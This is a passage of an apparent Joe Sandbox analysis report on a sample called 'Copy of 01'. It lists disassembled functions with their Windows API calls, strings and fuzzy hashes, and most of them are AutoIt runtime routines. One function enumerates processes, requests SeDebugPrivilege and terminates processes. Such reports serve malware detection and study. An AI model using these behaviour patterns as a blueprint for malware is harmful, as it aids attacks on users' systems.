                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                        • String ID:
                        • API String ID: 1957940570-0
                        • Opcode ID: eaa40f481eb2e7add0321592056a9f682d1f07d4055a789078cc9274d4e8946e
                        • Instruction ID: b1b700a873c485e482fd71dca7e9392ba09844114cf726ae414e8345e66cba38
                        • Opcode Fuzzy Hash: eaa40f481eb2e7add0321592056a9f682d1f07d4055a789078cc9274d4e8946e
                        • Instruction Fuzzy Hash: 3501CDB5250348BFE711AFB6DC4DF6B3BACEB89B11F045411FA09DB1A1CA74A800CB20
                        Function 003BA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0039D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
                          • Part of subcall function 0039D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
                          • Part of subcall function 0039D4DC: CloseHandle.KERNEL32(00000000), ref: 0039D5DC
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA16D
                        • GetLastError.KERNEL32 ref: 003BA180
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA1B3
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 003BA268
                        • GetLastError.KERNEL32(00000000), ref: 003BA273
                        • CloseHandle.KERNEL32(00000000), ref: 003BA2C4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: 64232c8e677c9fa6148473354d9beefab5a04011d07ae75428ae2a799a328524
                        • Instruction ID: a207151200fc5af053a5e8eb23148e5c5a06724e922290acc59c596a0e763207
                        • Opcode Fuzzy Hash: 64232c8e677c9fa6148473354d9beefab5a04011d07ae75428ae2a799a328524
                        • Instruction Fuzzy Hash: 7D61DF34204A42AFD722DF18C484F55BBE4AF44318F19848CE5668FBA3C776EC45CB82
                        Function 003C3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C3925
                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003C393A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C3954
                        • _wcslen.LIBCMT ref: 003C3999
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003C39C6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C39F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcslen
                        • String ID: SysListView32
                        • API String ID: 2147712094-78025650
                        • Opcode ID: e8703e918ef61a2947f6e6e0d53aa54279994193260cb9f6789ea85e8b2e0471
                        • Instruction ID: db07ba5dd6e9be34636e0de25a13e994670e54c9d709724978957ada5982eedb
                        • Opcode Fuzzy Hash: e8703e918ef61a2947f6e6e0d53aa54279994193260cb9f6789ea85e8b2e0471
                        • Instruction Fuzzy Hash: 3541D431A00318ABEF229F64CC45FEA7BA9FF08350F11452AF958E7291D7719E94CB90
                        Function 0039BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0039BCFD
                        • IsMenu.USER32(00000000), ref: 0039BD1D
                        • CreatePopupMenu.USER32 ref: 0039BD53
                        • GetMenuItemCount.USER32(014B6338), ref: 0039BDA4
                        • InsertMenuItemW.USER32(014B6338,?,00000001,00000030), ref: 0039BDCC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                        • String ID: 0$2
                        • API String ID: 93392585-3793063076
                        • Opcode ID: 7ed4526e5f47551ec796f20d2ceecf1375ac33fc614b41b3a2f3b2b679f33879
                        • Instruction ID: 610b3cfaaec524c7bb936f072b9074982a1ed9f9a090bddb223bdfa593717d53
                        • Opcode Fuzzy Hash: 7ed4526e5f47551ec796f20d2ceecf1375ac33fc614b41b3a2f3b2b679f33879
                        • Instruction Fuzzy Hash: 9D51C070A00209DBDF12DFA9EA88BAEFBF8FF45314F144159E445EB2A0D770A945CB61
                        Function 00352D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                        Download Yara Rule
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 00352D4B
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00352D53
                        • _ValidateLocalCookies.LIBCMT ref: 00352DE1
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00352E0C
                        • _ValidateLocalCookies.LIBCMT ref: 00352E61
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: &H5$csm
                        • API String ID: 1170836740-3207714950
                        • Opcode ID: 8b4475d9261b5722502fc78fac7b62f483cf61a9aa47167a273b0f1b3b17a854
                        • Instruction ID: 7303c40605d5e6402411e5a1fc2584b8fd825eed0015074bfee6c7471b105db0
                        • Opcode Fuzzy Hash: 8b4475d9261b5722502fc78fac7b62f483cf61a9aa47167a273b0f1b3b17a854
                        • Instruction Fuzzy Hash: 3F419434A00209DBCF16DF68C845E9FBBF5BF46366F158155EC24AB362D731AA09CB90
                        Function 0039C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 0039C913
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: b9faec9c173ab57c1955b909a7c29104882f85e2a8b33c7e3224c5a068fa0319
                        • Instruction ID: dd97bf855fd3eb458460b9adbc45feab16707e2b8921f62b1916931b31f15dd6
                        • Opcode Fuzzy Hash: b9faec9c173ab57c1955b909a7c29104882f85e2a8b33c7e3224c5a068fa0319
                        • Instruction Fuzzy Hash: D6110D3169D30ABAEF076B549C83CEB779CDF15359B21102AF904A6192D7706D445364
                        Function 0039ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$LocalTime
                        • String ID:
                        • API String ID: 952045576-0
                        • Opcode ID: 4b617a2600b6f1758d0505ee2f38c7528731c3987b62f97d81b1c69dfeacc731
                        • Instruction ID: 354658e010cf9b9ddf364570575040eca64697fd6ba7675e3a6347afc7f3108a
                        • Opcode Fuzzy Hash: 4b617a2600b6f1758d0505ee2f38c7528731c3987b62f97d81b1c69dfeacc731
                        • Instruction Fuzzy Hash: E5418065C1021875CB12EBB4888BDDFB7B8AF45711F508866E918E7132FB34E259C3E5
                        Function 0034F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0034F953
                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F3D1
                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F454
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: 48b2b04d575b2fccf4cd6748d51597ebe0122daf4a2d7f723da7ba817db42526
                        • Instruction ID: fe02a9a0c272762e68d89e9b64c303a04cba782f9e97d67dde06c86838a58c48
                        • Opcode Fuzzy Hash: 48b2b04d575b2fccf4cd6748d51597ebe0122daf4a2d7f723da7ba817db42526
                        • Instruction Fuzzy Hash: FC41D931618740BED7379F298988B2A7BD5AB56314F1D443DE0479F970C771B980C711
                        Function 003C2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 003C2D1B
                        • GetDC.USER32(00000000), ref: 003C2D23
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C2D2E
                        • ReleaseDC.USER32(00000000,00000000), ref: 003C2D3A
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C2D76
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C2D87
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 003C2DC2
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C2DE1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: c6395a60523ca25258029fc719969b66b5d7128e5ad041c7cd0f10ff3878dbfd
                        • Instruction ID: 076895cf6918434b9e03ea59e2a23f55b5c060add4db5a2b1b10225b210eeab1
                        • Opcode Fuzzy Hash: c6395a60523ca25258029fc719969b66b5d7128e5ad041c7cd0f10ff3878dbfd
                        • Instruction Fuzzy Hash: BA319C72211214BFEB128F50CC8AFEB3BADEF19711F084055FE09DA291C675AC51CBA0
                        Function 00395622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        • Opcode ID: 67b466794834f65e3f414b44121b391586d1d8d2487cf351a28d8e7438f5d26a
                        • Instruction ID: 725f5b10d6513255fce0f7b741ef83a92355ca1906c1a7e14e25c278beccfd2e
                        • Opcode Fuzzy Hash: 67b466794834f65e3f414b44121b391586d1d8d2487cf351a28d8e7438f5d26a
                        • Instruction Fuzzy Hash: 8721DB66741A097BDA175E209D92FFB335DAF20385F444034FD04DEA81F720EE5483A5
                        Function 003B4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 0-572801152
                        • Opcode ID: 308cc0d826e14691a45cc074d765f256948e2ff6e2bae565364d3e6810465271
                        • Instruction ID: 0cefa0c9726128e1cc8c5ef9cd7c7dbbc8abd8f0656588efd3c1a81a48dc3d79
                        • Opcode Fuzzy Hash: 308cc0d826e14691a45cc074d765f256948e2ff6e2bae565364d3e6810465271
                        • Instruction Fuzzy Hash: A5D1D075A0060A9FDF12DFA8C880FEEB7B5BF48348F158069EA15AB680D770DD41CB90
                        Function 00371522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                        Download Yara Rule
                        APIs
                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003715CE
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371651
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003717FB,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716E4
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716FB
                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371777
                        • __freea.LIBCMT ref: 003717A2
                        • __freea.LIBCMT ref: 003717AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                        • String ID:
                        • API String ID: 2829977744-0
                        • Opcode ID: 00b2636993de815f8edfcb20ee78838f84da1d89983d35e12a869fbe2a3607f1
                        • Instruction ID: 4d5683c9a4314e790555b88daafe4319bccec91cf055dd8ceddf00bda716c8ba
                        • Opcode Fuzzy Hash: 00b2636993de815f8edfcb20ee78838f84da1d89983d35e12a869fbe2a3607f1
                        • Instruction Fuzzy Hash: 2A91D573E102469ADB3A8E6CC881EEE7BB9AF45710F198519E809E7140D739DC44CBA0
                        Function 003B4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearInit
                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                        • API String ID: 2610073882-625585964
                        • Opcode ID: d8c3bd563869a3b3da1d2b1b5be9a1f4d03bfad90e3872e8f8754671f7893bbd
                        • Instruction ID: 75a60b4187353414c85a56d600e567e855b1a72abac8051e818c3f2782f776f6
                        • Opcode Fuzzy Hash: d8c3bd563869a3b3da1d2b1b5be9a1f4d03bfad90e3872e8f8754671f7893bbd
                        • Instruction Fuzzy Hash: C191C570A00219AFCF22CFA5C845FEEB7B8EF46714F108559F615AB682DB709941CFA4
                        Function 003A1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 003A125C
                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 003A1284
                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003A12A8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A12D8
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A135F
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A13C4
                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A1430
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                        • String ID:
                        • API String ID: 2550207440-0
                        • Opcode ID: 1260888f34085d8d23104b9d11c85cbc20721fe56dc7a9812cb3b3c4bed7bd59
                        • Instruction ID: cb9bbc8e52674bb705b8ac1a48ce8e9abe9241c3b68b4d0dcf841ae786a1fbf9
                        • Opcode Fuzzy Hash: 1260888f34085d8d23104b9d11c85cbc20721fe56dc7a9812cb3b3c4bed7bd59
                        • Instruction Fuzzy Hash: 28913475A00208AFDB07DF99C884BBEB7B9FF06321F118429E941EB291D774E941CB90
                        Function 0034948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                        • Instruction ID: 797007579a0e28533807adc3e9f975ca7893f8858cc9af3b6328c6f1ede3e4a7
                        • Opcode Fuzzy Hash: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                        • Instruction Fuzzy Hash: 1B913A71D00219EFCB12CFA9CC84AEEBBB9FF49320F25459AE515BB251D374A941CB60
                        Function 003B3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 003B396B
                        • CharUpperBuffW.USER32(?,?), ref: 003B3A7A
                        • _wcslen.LIBCMT ref: 003B3A8A
                        • VariantClear.OLEAUT32(?), ref: 003B3C1F
                          • Part of subcall function 003A0CDF: VariantInit.OLEAUT32(00000000), ref: 003A0D1F
                          • Part of subcall function 003A0CDF: VariantCopy.OLEAUT32(?,?), ref: 003A0D28
                          • Part of subcall function 003A0CDF: VariantClear.OLEAUT32(?), ref: 003A0D34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                        • API String ID: 4137639002-1221869570
                        • Opcode ID: bfdb8b294d637ded3aaeb275bab24a4e54ba13a27ebed07f154bd53a7cd75a3e
                        • Instruction ID: 0df644045c66102540d143ff37577256178a5dce3525cc45c5e98cb80bb3884e
                        • Opcode Fuzzy Hash: bfdb8b294d637ded3aaeb275bab24a4e54ba13a27ebed07f154bd53a7cd75a3e
                        • Instruction Fuzzy Hash: E4919B756083059FCB05DF28C4819AAB7E4FF89318F14882DF98A9B751DB30EE05CB82
                        Function 003B4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0039000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?,?,0039035E), ref: 0039002B
                          • Part of subcall function 0039000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390046
                          • Part of subcall function 0039000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?,?), ref: 00390054
                          • Part of subcall function 0039000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0038FF41,80070057,?), ref: 00390064
                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 003B4C51
